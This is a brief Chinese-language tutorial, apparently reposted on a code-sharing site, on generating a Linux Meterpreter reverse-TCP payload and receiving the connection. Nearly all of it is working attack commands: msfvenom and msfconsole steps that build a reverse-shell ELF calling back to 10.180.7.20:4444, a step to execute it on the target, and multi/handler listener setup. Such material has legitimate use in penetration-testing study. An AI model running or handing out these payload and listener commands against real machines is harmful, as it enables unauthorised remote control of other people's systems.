Linux下反弹meterpreter及生成payload的两种方式


1、CLI下生成payload

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=10.180.7.20 lport=4444 -f elf -o shell.elf

 

 

 

2、msfconsole下生成payload

use payload/linux/x86/meterpreter/reverse_tcp    并设置option

 

 

generate -h  有丰富的选项

 

 

generate -f elf -o /shell.elf   根据需要添加选项   -o输出文件到指定目录

 

 

 

3、在靶机上执行该文件,并在msf下监听

在靶机上给文件赋值,并执行该文件

 

 

在msf监听端口

msf  >  use exploit/multi/handler
msf  >  set payload linux/x86/meterpreter/reverse_tcp
msf  >  set LHOST 10.180.7.20
msf  >  run


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM